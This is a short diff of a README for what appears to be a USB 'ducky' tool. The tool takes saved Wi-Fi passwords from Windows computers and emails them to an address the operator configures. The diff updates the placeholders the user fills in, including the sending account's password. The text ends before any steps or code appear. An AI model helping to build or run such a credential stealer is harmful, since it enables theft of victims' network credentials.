fatouh4ck/Stilee--ducky-wifi-password-stealer/README.md

 A script that grabb wifi passwords on a Windows computer and sends them by email.

-You need to replace `EMAIL-SENDER` with the OUTLOOK mail address that will send the *.zip* and `EMAIL-RECEIVER` with the email address (any one) that will receive it.
+You must replace `EMAIL-SENDER` with the OUTLOOK address that will send the *.zip*, `PASSWORD` with the password of the Outlook address and `EMAIL-RECEIVER` with the email address (any one) that will receive the file.

 ### The script will (in order)